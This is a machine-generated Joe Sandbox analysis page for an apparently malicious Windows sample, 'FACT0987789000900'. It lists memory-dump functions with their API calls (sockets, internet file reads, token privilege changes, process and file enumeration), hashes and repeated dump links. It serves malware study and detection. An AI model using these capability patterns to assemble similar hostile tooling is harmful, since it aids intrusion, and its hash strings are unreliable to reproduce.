Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 8134deeff743bb3d489402322b6c3b3437744ae02433a06716a6cd3dc149a44a
Instruction ID: 520ae4fdfab26987373b0345089fa99a1476555f995c57dc4b00834bf4657474
Opcode Fuzzy Hash: 8134deeff743bb3d489402322b6c3b3437744ae02433a06716a6cd3dc149a44a
Instruction Fuzzy Hash: 31218371900218BBDB11ABA4EC98BEEB7BCAB04300F5004EBE505D3241E7759FC5CB64

Function 004E923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004EA82C: inet_addr.WS2_32(00000000), ref: 004EA84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 004E9296
WSAGetLastError.WS2_32(00000000,00000000), ref: 004E92B9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: c04845f949bf457e255ad4c7bbd2c31c93c0477c68106d47750944405c1af218
Instruction ID: a288415ea850c1206cc66c2fd75f82ac2c31a9a2009e718373f2a9a53697ed05
Opcode Fuzzy Hash: c04845f949bf457e255ad4c7bbd2c31c93c0477c68106d47750944405c1af218
Instruction Fuzzy Hash: 2941D670600100AFDB14AF69C842E7E77EDEF58728F04845EF9569B3D2DB78AD018BA5

Function 004DEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004DEB8A
_wcscmp.LIBCMT ref: 004DEBBA
_wcscmp.LIBCMT ref: 004DEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 004DEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 004DEC0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 429992d53e29d0c82aab3e6e6dd43eafdcbc5baeafef9d0a8528cb0b3415e1cf
Instruction ID: c001f82d3d9d3073df38357a77a4a723c4247486cea0a5b326e4ce1964048934
Opcode Fuzzy Hash: 429992d53e29d0c82aab3e6e6dd43eafdcbc5baeafef9d0a8528cb0b3415e1cf
Instruction Fuzzy Hash: 4641E2356003019FC718EF29C4A1A9AB7E4FF5A324F10451FE95A8B3A1DB39F944CB59

Function 004F8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004F8160
IsWindowEnabled.USER32 ref: 004F816E
GetForegroundWindow.USER32(?,?,00000001), ref: 004F817B
IsIconic.USER32 ref: 004F8189
IsZoomed.USER32 ref: 004F8197

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: cae2336d3064243d7c42a804ccfaa89280e12fbedeb4dfaed6bb2628365af629
Instruction ID: 4f84fe3fd92eba9c902d599bf06a08ff65adcafc28c2eb017f76bbe9974df9d5
Opcode Fuzzy Hash: cae2336d3064243d7c42a804ccfaa89280e12fbedeb4dfaed6bb2628365af629
Instruction Fuzzy Hash: D011E2313001196BEB212F26DD44E7F7BADEF50320B04452EF949DB281CF78980286A9

Function 00499B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 0051BE14
ERCP, xrefs: 00499C32
VUUU, xrefs: 00499ED4
VUUU, xrefs: 00499E95
VUUU, xrefs: 00499EA7

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 21c962f80e8e88a16d0e61c5cf48d394715eef43d2bf38a1c5af60bd7ce87a83
Instruction ID: be90165fbdb2c2b7bb2c78ae37ec7071fc0b08fc85a8e872d382636face0070d
Opcode Fuzzy Hash: 21c962f80e8e88a16d0e61c5cf48d394715eef43d2bf38a1c5af60bd7ce87a83
Instruction Fuzzy Hash: E5926F75E0021ACBEF24CF58C8807EDBBB1BB54314F1485AAD816A7384D7799DC1CB96

Function 004AE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004AE014,771B0AE0,004ADEF1,0052DC38,?,?), ref: 004AE02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004AE03E

Strings

kernel32.dll, xrefs: 004AE027
GetNativeSystemInfo, xrefs: 004AE038

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 8cce6cf882eb6c83262b2dadc6d58b37974b18ed36bcebc1f6ccbd1fb097d54a
Instruction ID: 2c3c7c9e1aa9d400ce7a81c7c793386dd6a482d103e131f427d2afc98744445e
Opcode Fuzzy Hash: 8cce6cf882eb6c83262b2dadc6d58b37974b18ed36bcebc1f6ccbd1fb097d54a
Instruction Fuzzy Hash: 0CD0A730444732AFC7354F61EC086A37EE8BB21304F18841AF491D2250D7B8C884CA60

Function 004FF1D7 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

GetCursorPos.USER32(?), ref: 004FF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0050E4C0,?,?,?,?,?), ref: 004FF226
GetCursorPos.USER32(?), ref: 004FF270
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0050E4C0,?,?,?), ref: 004FF2A6

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: 0a744380f35149b2cca9ebf910729778f608774c02428a507794c42bd954a3c2
Instruction ID: ac51ca0b72ea40086cd69b5a7c08390b6b4e95cfd1494cf4c8b69d7aab3e20c9
Opcode Fuzzy Hash: 0a744380f35149b2cca9ebf910729778f608774c02428a507794c42bd954a3c2
Instruction Fuzzy Hash: D721F238500018AFDB258F84D858EFB7FB5FF09310F0580AAFA054B2A1C3399954EBA4

Function 004AB55D Relevance: 6.1, APIs: 4, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 004AB5A5
GetClientRect.USER32(?,?), ref: 0050E69A
GetCursorPos.USER32(?), ref: 0050E6A4
ScreenToClient.USER32(?,?), ref: 0050E6AF

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: a52f0aa4e14c150c59a33443ac2c1f411ca28057fcf72573fbf9f987f66c4001
Instruction ID: 02c228862402942e8f44bdf28f763b39d06733311e3614faacc731de79bea84f
Opcode Fuzzy Hash: a52f0aa4e14c150c59a33443ac2c1f411ca28057fcf72573fbf9f987f66c4001
Instruction Fuzzy Hash: F4113631900029BBCB10DFA4D9469EE7BB9FF29309F104456E902E7141D738AA86DBA9

Function 004AB11F Relevance: 4.9, APIs: 3, Instructions: 377nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 004AB22F

Part of subcall function 004AB55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 004AB5A5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogNtdllProc_$LongWindow
String ID:
API String ID: 1155049231-0
Opcode ID: 21d8ce2d9a69f0d2c32c28bc4fc39d601889b21e70714b34a237d2e630d28a12
Instruction ID: c5584f631389400ca581803c6d58c1145463f17a909a80325bc7043235c2f704
Opcode Fuzzy Hash: 21d8ce2d9a69f0d2c32c28bc4fc39d601889b21e70714b34a237d2e630d28a12
Instruction Fuzzy Hash: 5DA12371114105BADA286A2A4C9EFBF2D5CFB73344B24495FF901D62D3DB1D9C02A2BB

Function 004E4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004E43BF,00000000), ref: 004E4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004E4FD2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: d9aa1f16ca1b736624ee0876a5e226c31f27d3d9c2e669c0096bc9c696a9ad5e
Instruction ID: af601d599a14b61edf8845d35b1bee01621ef63bbe02f2705b6d67b547a40780
Opcode Fuzzy Hash: d9aa1f16ca1b736624ee0876a5e226c31f27d3d9c2e669c0096bc9c696a9ad5e
Instruction Fuzzy Hash: 02410B71904245BFEB20DF86DC85EBF77BCEB8071AF10405FF20566181D6799E4196A8

Function 004DE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004DE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004DE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004DE2B4

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: b7edd3eecc02cc4ef9fdd049b260af9fd2e9cc09d05be2330264ca7edeee9377
Instruction ID: 63e239a5eeb7b29172cd30d19327cf2d3e62bf6eafb44b4db8ddc01b5dd7b052
Opcode Fuzzy Hash: b7edd3eecc02cc4ef9fdd049b260af9fd2e9cc09d05be2330264ca7edeee9377
Instruction Fuzzy Hash: C6219D35A00118EFCB00EFA5D894AEDBBB8FF59314F0480AAE905AB351DB359905CB54

Function 004CB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 004AF4EA: std::exception::exception.LIBCMT ref: 004AF51E
Part of subcall function 004AF4EA: __CxxThrowException@8.LIBCMT ref: 004AF533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004CB180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004CB1AD
GetLastError.KERNEL32 ref: 004CB1BA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 6521675667d4c411fb036eaa90b7cab7898cf39704dd3337786b45efa602afab
Instruction ID: e1488895b4183fac7f841fe70dd26b78433a2873ad9e5530392136693d768875
Opcode Fuzzy Hash: 6521675667d4c411fb036eaa90b7cab7898cf39704dd3337786b45efa602afab
Instruction Fuzzy Hash: FE11CEB2900304AFE718AFA4DCC6D6BB7BCFB58350B20852EE45693240EB74FC458A64

Function 004D6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004D6623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004D6664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004D666F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 162bdad4e95a41ef459c36caf80e25db0a641da4ab17a8ab1dc8b5759976d4cf
Instruction ID: 676c981f3238431163392a25a3b0c85fc501ce60c2e041dde6e1c3ac60380784
Opcode Fuzzy Hash: 162bdad4e95a41ef459c36caf80e25db0a641da4ab17a8ab1dc8b5759976d4cf
Instruction Fuzzy Hash: B5115E71E01228BFDB108FA9DC44BEFBBBCEB49B10F108152F910E7290D3B05A059BA5

Function 004D71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004D7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004D723A
FreeSid.ADVAPI32(?), ref: 004D724A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 6ff12d0e28daae4e072a19c84222a4c5f3bad06044ac565112825a41954754b9
Instruction ID: 465faee852b0a73eadb53e7080792637f95dbd35c56c6a44d035a7f9ef976a91
Opcode Fuzzy Hash: 6ff12d0e28daae4e072a19c84222a4c5f3bad06044ac565112825a41954754b9
Instruction Fuzzy Hash: 33F01275904209BFDF04DFE5DD9DAEEBBB9EF08301F108469A502E2191E2755744DB14

Function 004AB385 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537

GetParent.USER32(?), ref: 0050E5B2
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,004AB1E8,?,?,?,00000006,?), ref: 0050E62C

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: c173683e6030b5cbea3f8bc1907dd5c7e12059c717c5d8a861423e79d5b1e7e7
Instruction ID: c6413bf5cfa2ae33f9afe10dab307ed0810bf430c92dbd8463bfc272abb65061
Opcode Fuzzy Hash: c173683e6030b5cbea3f8bc1907dd5c7e12059c717c5d8a861423e79d5b1e7e7
Instruction Fuzzy Hash: 75219134601504AFCF248B289C95AAE3F96EF6B328F184657F9294B3E2C7359D01D798

Function 004DF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004DF599
FindClose.KERNEL32(00000000), ref: 004DF5C9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ce818b74c777511ca743372e52ee42cbfc1225ee14323ac93c8762014ccdc11d
Instruction ID: 6f1574044db1565d49d55e40050b6ac8d6c0fdb3c834f55255566d678836709a
Opcode Fuzzy Hash: ce818b74c777511ca743372e52ee42cbfc1225ee14323ac93c8762014ccdc11d
Instruction Fuzzy Hash: 461182316002009FD710EF29D855A6EB7E5FF95324F00851EF86597391DB74A9058B95

Function 004FF2D0 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0050E44F,?,?,?), ref: 004FF344

Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004FF32A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

